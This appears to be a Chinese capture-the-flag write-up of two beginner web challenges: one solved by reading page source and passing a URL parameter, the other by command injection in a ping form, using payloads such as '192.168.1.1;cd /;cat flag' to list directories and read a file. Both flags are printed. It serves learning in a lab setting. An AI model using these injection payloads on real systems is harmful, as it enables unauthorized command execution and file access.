进来啥都没
那还能咋办
F12大法!
这啥玩意绿不拉几的映入眼帘
翻了翻就这么段有点用,那么现在我们就来进行简单的代码审计
这里用cat接受变量,然后用cat变量中的参数与‘dog’进行比较
然后输出
那还等什么,试试就逝世
/?cat=dog放url后边
成功
flag{d6102262-c9b3-4cfc-8970-2f9d1def24ad}
界面很干净,随便输个IP ping一下,看看搞什么名堂
看着像能注入的样子
试试192.168.1.1;ls
诶,直接确定了这是Linux系统,而且没有过滤分号和ls
那就遍历目录吧
从根目录开始吧,不然多了自己都乱了
192.168.1.1;cd /;ls
wow意外之喜,看到了flag
进去看看
192.168.1.1;cd /flag;ls
没有东西,他可能不是一个目录
试试cat看看
192.168.1.1;cd /;cat flag
拿到flag
flag{99e7364b-3c18-4acc-bec2-d8b1ea9fa420}